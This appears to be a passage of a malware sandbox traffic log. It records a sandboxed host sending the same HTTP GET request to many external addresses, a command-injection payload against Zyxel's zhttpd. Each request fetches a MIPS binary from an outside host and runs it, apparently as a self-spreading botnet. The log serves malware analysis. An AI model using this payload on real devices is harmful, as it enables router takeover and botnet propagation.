                                            Feb 2, 2024 06:21:32.031627893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9481192.168.2.1545062124.158.4.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031662941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9482192.168.2.1536806130.240.38.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031693935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9483192.168.2.1558468201.212.88.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031734943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9484192.168.2.1548558140.147.98.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031753063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9485192.168.2.154824058.217.29.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031817913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9486192.168.2.155702484.34.195.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031851053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9487192.168.2.154099023.31.146.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031892061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9488192.168.2.154198092.29.54.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031919956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9489192.168.2.1544758109.147.21.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031975031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9490192.168.2.153760213.198.111.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032006025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9491192.168.2.1552102220.15.205.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032046080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9492192.168.2.1538200118.66.113.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032099009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9493192.168.2.1540656199.173.184.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032136917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9494192.168.2.154859280.155.99.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032202959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9495192.168.2.15509785.108.44.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032234907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9496192.168.2.154673424.174.250.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032299995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9497192.168.2.1551912187.95.26.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032340050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9498192.168.2.154378690.234.225.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032377958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9499192.168.2.1553102150.43.226.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032404900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9500192.168.2.1539054100.24.135.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032433987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9501192.168.2.1534116175.251.79.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032484055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9502192.168.2.1536836106.229.224.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032526016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9503192.168.2.154666878.98.49.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032567978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9504192.168.2.1547008143.128.225.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032609940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9505192.168.2.1560564155.142.116.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032644033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9506192.168.2.1553728201.210.76.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032685041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9507192.168.2.1560148166.49.99.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032727003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9508192.168.2.1537160175.178.199.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032762051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9509192.168.2.1545828211.111.131.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.032835007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9510192.168.2.154658654.9.252.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.036309004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9511192.168.2.1559968131.155.30.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045164108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9512192.168.2.153676852.174.229.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045211077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9513192.168.2.1554710197.106.160.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045233011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9514192.168.2.153285212.127.38.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045278072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9515192.168.2.155433047.197.37.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045334101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9516192.168.2.1544328178.87.32.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045373917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9517192.168.2.1546456190.40.100.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045423031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9518192.168.2.155228866.16.198.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045460939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9519192.168.2.1560870206.165.163.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045480967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9520192.168.2.153813851.194.63.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045516968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9521192.168.2.1552588206.98.199.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045583010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9522192.168.2.1537146216.27.95.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045619011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9523192.168.2.155866885.141.126.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045667887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9524192.168.2.1547344180.2.67.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045708895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9525192.168.2.1537240132.207.103.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045736074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9526192.168.2.1541608118.150.133.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045763016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9527192.168.2.155970879.199.193.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045805931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9528192.168.2.155065449.209.111.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045845985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9529192.168.2.155988643.173.180.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045891047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9530192.168.2.156074286.189.139.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045936108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9531192.168.2.153536674.35.224.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.045968056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9532192.168.2.153413263.86.255.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046027899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9533192.168.2.155992420.228.147.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046087027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9534192.168.2.1551104155.205.196.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046137094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9535192.168.2.1549350132.118.73.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046166897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9536192.168.2.155330694.188.203.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046212912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9537192.168.2.154456846.236.211.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046240091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9538192.168.2.154553846.229.132.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046295881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9539192.168.2.153430287.248.246.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046329021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9540192.168.2.1544086170.182.170.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046369076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9541192.168.2.1535804144.18.162.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046423912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9542192.168.2.154716037.55.114.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046457052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9543192.168.2.154958623.152.231.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046497107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9544192.168.2.153502282.157.92.107443
                                            TimestampBytes transferredDirectionData
